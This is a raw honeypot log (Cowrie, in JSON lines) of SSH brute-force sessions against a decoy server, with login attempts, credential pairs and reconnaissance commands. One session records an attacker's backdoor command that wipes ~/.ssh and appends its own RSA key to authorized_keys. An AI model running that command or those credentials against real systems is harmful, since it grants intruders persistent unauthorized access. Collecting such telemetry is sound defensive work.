{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T17:47:48.850305Z","src_ip":"212.227.235.229","session":"99179300ab13"}
{"eventid":"cowrie.login.success","username":"root","password":"101010*333","message":"login attempt [root/101010*333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:47:49.983698Z","src_ip":"212.227.235.229","session":"99179300ab13"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:47:50.545766Z","src_ip":"212.227.235.229","session":"99179300ab13"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T17:47:50.546584Z","src_ip":"212.227.235.229","session":"99179300ab13"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:47:50.818189Z","src_ip":"212.227.235.229","session":"99179300ab13"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:47:50.819264Z","src_ip":"212.227.235.229","session":"99179300ab13"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55350,"dst_ip":"1.2.3.4","dst_port":22,"session":"2667b1236234","protocol":"ssh","message":"New connection: 212.227.235.229:55350 (1.2.3.4:22) [session: 2667b1236234]","sensor":"my-vps","timestamp":"2025-08-28T17:48:03.314317Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:48:03.357985Z","src_ip":"212.227.235.229","session":"2667b1236234"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T17:48:03.449662Z","src_ip":"212.227.235.229","session":"2667b1236234"}
{"eventid":"cowrie.login.failed","username":"opnsense","password":"opnsense","message":"login attempt [opnsense/opnsense] failed","sensor":"my-vps","timestamp":"2025-08-28T17:48:04.020818Z","src_ip":"212.227.235.229","session":"2667b1236234"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49284,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a973580f989","protocol":"ssh","message":"New connection: 212.227.235.229:49284 (1.2.3.4:22) [session: 6a973580f989]","sensor":"my-vps","timestamp":"2025-08-28T17:48:04.209862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:48:04.211369Z","src_ip":"212.227.235.229","session":"6a973580f989"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:48:04.316385Z","src_ip":"212.227.235.229","session":"6a973580f989"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ\"wsx","message":"login attempt [root/!QAZ\"wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:48:04.632173Z","src_ip":"212.227.235.229","session":"6a973580f989"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:48:04.860719Z","src_ip":"212.227.235.229","session":"6a973580f989"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T17:48:04.861484Z","src_ip":"212.227.235.229","session":"6a973580f989"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:48:04.967860Z","src_ip":"212.227.235.229","session":"6a973580f989"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:48:04.968982Z","src_ip":"212.227.235.229","session":"6a973580f989"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:48:05.201854Z","src_ip":"212.227.235.229","session":"2667b1236234"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":40792,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc41e56d43d9","protocol":"ssh","message":"New connection: 199.195.253.95:40792 (1.2.3.4:22) [session: cc41e56d43d9]","sensor":"my-vps","timestamp":"2025-08-28T17:48:36.753442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:48:36.757861Z","src_ip":"199.195.253.95","session":"cc41e56d43d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:48:37.017865Z","src_ip":"199.195.253.95","session":"cc41e56d43d9"}
{"eventid":"cowrie.login.success","username":"root","password":"elephant","message":"login attempt [root/elephant] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:48:37.844650Z","src_ip":"199.195.253.95","session":"cc41e56d43d9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:48:38.200204Z","src_ip":"199.195.253.95","session":"cc41e56d43d9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:48:38.200908Z","src_ip":"199.195.253.95","session":"cc41e56d43d9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:48:38.202105Z","src_ip":"199.195.253.95","session":"cc41e56d43d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:48:38.401910Z","src_ip":"199.195.253.95","session":"cc41e56d43d9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:48:38.774399Z","src_ip":"199.195.253.95","session":"cc41e56d43d9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T17:48:38.775157Z","src_ip":"199.195.253.95","session":"cc41e56d43d9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T17:48:38.936325Z","src_ip":"199.195.253.95","session":"cc41e56d43d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:48:38.937147Z","src_ip":"199.195.253.95","session":"cc41e56d43d9"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":41674,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf0b7445c256","protocol":"ssh","message":"New connection: 199.195.253.95:41674 (1.2.3.4:22) [session: cf0b7445c256]","sensor":"my-vps","timestamp":"2025-08-28T17:48:39.062047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:48:39.068525Z","src_ip":"199.195.253.95","session":"cf0b7445c256"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:48:39.190517Z","src_ip":"199.195.253.95","session":"cf0b7445c256"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T17:48:39.737619Z","src_ip":"199.195.253.95","session":"cf0b7445c256"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:48:40.952832Z","src_ip":"199.195.253.95","session":"cf0b7445c256"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":42542,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9f36e4fd745","protocol":"ssh","message":"New connection: 199.195.253.95:42542 (1.2.3.4:22) [session: d9f36e4fd745]","sensor":"my-vps","timestamp":"2025-08-28T17:48:41.146954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:48:41.155952Z","src_ip":"199.195.253.95","session":"d9f36e4fd745"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:48:41.399731Z","src_ip":"199.195.253.95","session":"d9f36e4fd745"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:48:42.463135Z","src_ip":"199.195.253.95","session":"d9f36e4fd745"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:48:42.715020Z","src_ip":"199.195.253.95","session":"cc41e56d43d9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:48:42.716214Z","src_ip":"199.195.253.95","session":"d9f36e4fd745"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34738,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b5025e07eae","protocol":"ssh","message":"New connection: 212.227.125.160:34738 (1.2.3.4:22) [session: 1b5025e07eae]","sensor":"my-vps","timestamp":"2025-08-28T17:48:43.803089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:48:44.138982Z","src_ip":"212.227.125.160","session":"1b5025e07eae"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:48:44.157753Z","src_ip":"212.227.125.160","session":"1b5025e07eae"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T17:48:45.981393Z","src_ip":"212.227.125.160","session":"1b5025e07eae"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:48:48.365955Z","src_ip":"212.227.125.160","session":"1b5025e07eae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40114,"dst_ip":"1.2.3.4","dst_port":22,"session":"055fbae7f03f","protocol":"ssh","message":"New connection: 212.227.235.229:40114 (1.2.3.4:22) [session: 055fbae7f03f]","sensor":"my-vps","timestamp":"2025-08-28T17:49:01.887458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:49:01.888561Z","src_ip":"212.227.235.229","session":"055fbae7f03f"}
